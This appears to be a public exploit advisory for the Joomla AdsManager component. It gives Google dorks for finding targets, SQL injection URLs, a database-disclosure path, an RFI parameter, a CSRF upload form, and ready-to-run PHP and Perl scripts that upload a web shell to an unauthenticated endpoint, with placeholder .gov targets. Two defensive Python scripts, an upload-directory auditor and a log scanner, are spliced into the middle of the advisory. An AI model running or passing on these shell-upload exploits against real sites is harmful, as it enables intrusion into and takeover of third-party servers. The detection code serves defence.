######################################################################################################

# Exploit Title : Joomla AdsManager Components 3.2.0 CSRF / RFI / Backdoor Access / SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/02/2019
# Vendor Homepage : joomprod.com ~ juloa.com
# Software Download Link : joomprod.com/download.html
github.com/amet17/webstar/tree/master/www/administrator/components/com_adsmanager/
# Software Information Link : extensions.joomla.org/extension/adsmanager/
# Software Affected Version : 1.0 ~ 2.5 ~ 2.6 ~ 2.9.13 ~ 3.1.0 - 3.2.0
and all previous versions may be vulnerable.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Low / Medium
# Google Dorks : inurl:"/index.php?option=com_adsmanager"
intext:''Productos Software powered by Juloa.com''
intext:''Classifield Ads by AdsManager''
intext:''Designed by Ricky Browne T/as Redesigner.''
intext:''Designed by JoomlArt.com.''
intext:''Joomla Templates Club"
intext:''Aspetto grafico del sito curato da Gianni Marruccella''
intext:''Joomla 1.6 Template by sinci''
intext:''2019 Scuola Windsurf Salerno''
intext:''Powered by Joomla!. valid XHTML and CSS.''
intext:''Copyright (c) 2015 Morningdew Farms. All Rights Reserved."
intext:''Site mis en ligne par NET'MOTIV''
intext:''Copyright (c) 2016 NWPCS - Ontwerp en realisatie: Foppenreclame BV Harderwijk''
intext:''Powered by Fabio Panna Joomla template by SiteGround''
intext:''La Centrale des Annonces est editee par la Sarl Quartz''
More on Google and other Search Engines ......
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

######################################################################################################

# Description about Software :
***************************
AdsManager is the leading classified ads component for Joomla!

Real Estate, Cars, Pets, Electronics, Furniture, etc .....

whatever your classified project is, AdsManager can be configured to fit many needs.

AdsManager provides plenty of options, flexible views and extensions to help you to build your website.

######################################################################################################

# Impact and Consequences :
**************************

* Joomla AdsManager is prone to CSRF, RFI, file upload and SQL injection vulnerabilities.

* Joomla AdsManager Components 3.2.0 and other previous versions are prone to an SQL injection vulnerability because the component fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

* The AdsManager component for Joomla is prone to an arbitrary file upload / shell upload vulnerability. The vulnerability is due to a design flaw in the application: it handles a file upload request without authentication. A remote attacker may be able to exploit this to execute arbitrary code within the context of the application by uploading an arbitrary file without any authentication. System compromise: remote attackers can gain control of vulnerable systems.

* This software is prone to a cross-site request forgery vulnerability due to insufficient CSRF protection. An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. The web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

* The AdsManager component is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

######################################################################################################

# PHP - PERL - Cross Site Request Forgery - Remote File Inclusion / File Upload / Shell Upload - SQL Injection Exploits :
*********************************************************************************************************
######################################################################################################

# SQL Injection Exploit =>
**************************
/index.php?option=com_adsmanager&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=write_ad&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_all&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_rules&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_profile&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_ad&adid=[ID-NUMBER]&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]

/index.php?option=com_adsmanager&view=details&id=[ID-NUMBER]&ad_tier=[ID-NUMBER]&catid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&format=feed&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php/component/option,com_adsmanager/page,show_category/catid,1/order,0/limit,20/limitstart,0/expand,0/Itemid,30/ => [ SQL Error ]

/index.php?option=com_adsmanager&page=show_category&catid=[ID-NUMBER]&text_search=&order=[ID-NUMBER]&expand=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&userid=[ID-NUMBER]&order=[ID-NUMBER]&expand=[ID-NUMBER]&order=[ID-NUMBER]&Itemid=[SQL Injection]

######################################################################################################

# Database Disclosure Exploit =>
*******************************
/administrator/components/com_adsmanager/install.sql

######################################################################################################

Direct Access Exploit =>
***********************
/index.php?option=com_adsmanager&task=upload&tmpl=component

/index.php?option=com_adsmanager&task=upload&tmpl=component&Itemid=[ID-NUMBER]

# Example Vulnerability Errors :
*****************************
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_95"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_100"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_4206"}

Shell Uploaded =>
*******************
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"}

# Directory File Path :
*******************

/tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]

Another Direct Access Exploit =>
*****************************
/index.php?option=com_adsmanager&page=write_ad&catid=3&Itemid=1

/index.php?option=com_adsmanager&page=write_ad&catid=[ID-NUMBER-MAY-DIFFERENT]&Itemid=[ID-NUMBER-MAY-DIFFERENT]

/index.php?option=com_adsmanager&Itemid=694&task=write&catid=71

/index.php?option=com_adsmanager&Itemid=[ID-NUMBER-MAY-DIFFERENT]&task=write&catid=[ID-NUMBER-MAY-DIFFERENT]

Check the Page =>
***************
/index.php?option=com_adsmanager&page=show_all&Itemid=1

# Directory File Path :
*******************
/images/com_adsmanager/ads/[RANDOMNUMBERS-ALPHABET].jpg .gif .png .php;.gif

######################################################################################################

# PHP Exploiter Code [ Proof of Concept PoC ] =>
**********************************************
<?php
$url = "www.[VULNERABLESITEHERE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@SHELLNAMEHERE-CYBERIZM.jpg",
"name" => "SHELLNAMEHERE-CYBERIZM.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

######################################################################################################

# Another PHP Exploitation Code [ Proof of Concept PoC ] =>
*******************************************************

*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
function __plus() {
ob_flush();
flush();
}
function __request($params) {
$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@SHELLNAMEHERE-CYBERIZM.jpg", "name" => "SHELLNAMEHERE-CYBERIZM.php"));
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1);
$info['corpo'] = curl_exec($objcurl);
$info['server'] = curl_getinfo($objcurl);
curl_close($objcurl);
$gh = get_headers($params['cmd'], 1);
foreach ($gh as $key => $value) {
echo " [INFO][{$key}]:: {$value} ";
}
$_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200'));
echo "-------------------------------------------------------------- ";
print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL ");
if (strstr($info['corpo'], '"tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"')) {
print " [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_ArbitraryFileUploadAdsManager_Joomla.txt", "{$params['cmd']} ", FILE_APPEND) : '[-] ERROR!');
print " [INFO] Successfully Upload! ";
}
echo "-------------------------------------------------------------- ";
}
echo " [+] Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability By Cyberizm Digital Security Army ";
$params = array('cmd' => "{$argv[1]}/tmp/plupload/SHELLNAMEHERE-CYBERIZM.php", 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit(" 0x[ERRO] DEFINE TARGET! "));
__request($params) . __plus();

######################################################################################################

# Usage of this Exploit =>
************************

# EXECUTE: php exploit.php www.VULNERABLESITE.gov
# OUTPUT: Exploit_AFU_Joomla.txt
# FILE UPLOAD: SHELLNAMEHERE-CYBERIZM.jpg => code shell: <?php system('id'); ?>

# Directory File Path : /tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]
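
For responders, the two upload locations named above (/tmp/plupload/ and /images/com_adsmanager/ads/) can be audited on disk for planted code. The following is an added example, not part of the original advisory or of AdsManager; the function names, reason labels and the sample files built in `demo()` are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

UPLOAD_DIRS = ("tmp/plupload", "images/com_adsmanager/ads")  # paths named in the advisory
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|cgi)(?![a-z0-9])", re.I)
IMAGE_MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
               ".gif": b"GIF8", ".png": b"\x89PNG\r\n\x1a\n"}

def audit_file(path):
    """Return the reasons a file in an upload directory looks like planted code."""
    reasons = []
    if SCRIPT_EXT.search(path.name):            # matches x.php and x.php;.gif alike
        reasons.append("script-extension")
    head = path.read_bytes()[:4096]
    if b"<?php" in head.lower():                # script body behind any extension
        reasons.append("php-open-tag")
    magic = IMAGE_MAGIC.get(path.suffix.lower())
    if magic and not head.startswith(magic):    # ".jpg" that is not a JPEG
        reasons.append("image-extension-without-image-header")
    return reasons

def audit_docroot(docroot):
    """Walk both upload directories under docroot; return {relative_path: reasons}."""
    root, report = Path(docroot), {}
    for rel in UPLOAD_DIRS:
        for p in sorted((root / rel).rglob("*")):
            if p.is_file() and (reasons := audit_file(p)):
                report[p.relative_to(root).as_posix()] = reasons
    return report

def demo():
    """Build a throwaway docroot from constructed placeholder files and audit it."""
    samples = {
        "tmp/plupload/sample.php": b"<?php /* constructed placeholder */ ?>",
        "images/com_adsmanager/ads/ab12.php;.gif": b"GIF89a<?php /* placeholder */ ?>",
        "images/com_adsmanager/ads/cd34.jpg": b"\xff\xd8\xff\xe0" + b"\0" * 16,
        "images/com_adsmanager/ads/ef56.png": b"<?php /* placeholder */ ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, data in samples.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        return audit_docroot(tmp)

if __name__ == "__main__":
    for rel_path, why in demo().items():
        print(rel_path, why)
```

Point `audit_docroot()` at the Joomla document root; a genuine image with a matching header and no script marker, such as the constructed cd34.jpg, produces no entry.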

######################################################################################################

# Another Perl Exploiter Code [ Proof of Concept PoC ] =>
***************************************************
#!/usr/bin/perl

my $ua = LWP::UserAgent->new;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print <<logo;

CYBERIZM DIGITAL SECURITY ARMY

logo

print " [-] Joomla AdsManager File Upload/Shell Upload Exploit ";

print " Enter Target URL : ";
my $url=<>;
chomp($url);

my $exploit = "$url/index.php?option=com_adsmanager&task=upload&tmpl=component";

my $response = $ua->post( $exploit, ookie => "", Content_Type => "form-data", Content => [file => ["kingskrupellos.jpg"], name => "kingskrupellos.html"]);

$shell="$url/tmp/plupload/kingskrupellos.html";

$payload = $ua->get("$shell")->content;
if($payload =~/Hacked/)
{
print " Deface Uploaded successfully = $shell ";
}
else {
print " Target Is Not Vulnerable ";
}

print " Back To list or No(Y or N) : ";
my $let=<>;
chomp($let);
if ($let eq "y" or $let eq "Y")
{
local $CWD = '../../../..';
system "perl cyberizm.pl";
}
elsif ($let eq "n" or $let eq "N")
{
system "";
}

######################################################################################################

# Remote File Inclusion Exploit =>
******************************

/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]
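
The request patterns listed so far (integer ID parameters carrying non-numeric data, the unauthenticated upload task, script files under the upload directories, install.sql reads and the mosConfig_absolute_path parameter) can be hunted for in web server access logs. The following is an added detection example, not part of the original advisory; it assumes Apache/nginx combined log format, and the finding labels, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters the advisory lists as injection points; all are integer IDs.
INT_PARAMS = {"Itemid", "catid", "adid", "id", "ad_tier", "limitstart",
              "order", "expand", "userid"}
UPLOAD_DIRS = ("/tmp/plupload/", "/images/com_adsmanager/ads/")
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|cgi)\b")  # also hits "x.php;.gif"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(method, target):
    """Return finding labels for one request; an empty list means nothing matched."""
    parts = urlsplit(target)
    path, qs = parts.path.lower(), parse_qs(parts.query)  # parse_qs URL-decodes values
    found = []
    if path.endswith("/administrator/components/com_adsmanager/install.sql"):
        found.append("install-sql-read")
    if any(d in path and SCRIPT_EXT.search(path.split(d, 1)[1]) for d in UPLOAD_DIRS):
        found.append("script-in-upload-dir")
    if qs.get("option", [""])[0] == "com_adsmanager":
        if qs.get("task", [""])[0] == "upload":
            found.append("upload-post" if method == "POST" else "upload-probe")
        if "mosConfig_absolute_path" in qs:
            found.append("rfi-parameter")
        bad = sorted(k for k, vals in qs.items() if k in INT_PARAMS
                     and any(not re.fullmatch(r"\d+", v, re.ASCII) for v in vals))
        if bad:
            found.append("non-numeric:" + ",".join(bad))
    return found

def scan(lines):
    """Return (line_number, status, findings) for every log line with a finding."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and (found := classify(m["method"], m["target"])):
            hits.append((n, m["status"], found))
    return hits

# Constructed sample lines (documentation addresses), not taken from a real server.
SAMPLE = [
    '192.0.2.10 - - [20/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_adsmanager&view=list&catid=3&Itemid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Feb/2019:10:02:11 +0000] "GET /index.php?option=com_adsmanager&view=list&catid=3&Itemid=12%27 HTTP/1.1" 500 310',
    '192.0.2.44 - - [20/Feb/2019:10:03:40 +0000] "POST /index.php?option=com_adsmanager&task=upload&tmpl=component HTTP/1.1" 200 71',
    '192.0.2.44 - - [20/Feb/2019:10:03:42 +0000] "GET /tmp/plupload/sample.php HTTP/1.1" 200 15',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A 200 response to a script under an upload directory shortly after an upload POST from the same client is the sequence to escalate; the search-engine-friendly URL form (option,com_adsmanager/...) is not parsed by this example.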

######################################################################################################

# Learn PHP Version for AdsManager Exploit =>
*******************************************
/phpinfo.php/index.php?option=com_adsmanager

Example =>

PHP Version 5.1.6
PHP Credits
Configuration
PHP Core
apache2handler
Apache Environment
HTTP Headers Information
PHP Variables
PHP License

######################################################################################################

# CSRF Cross Site Request Forgery Exploiter =>
******************************************

<form method=POST action=http://[VULNERABLESITE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component
enctype=multipart/form-data>
<input type=file name=files[] /><button>Upload</button>
</form>

#####################################################################################################

# Example SQL Database Error =>
*******************************
Warning: include_once(/home/centralexf/www/administrator/components/com_comprofiler/ue_config.php) [function.include-once]: failed to open stream: No such file or directory in /home/centralexf/www/components/com_adsmanager/views/edit/tmpl/default.php on line 275

######################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

######################################################################################################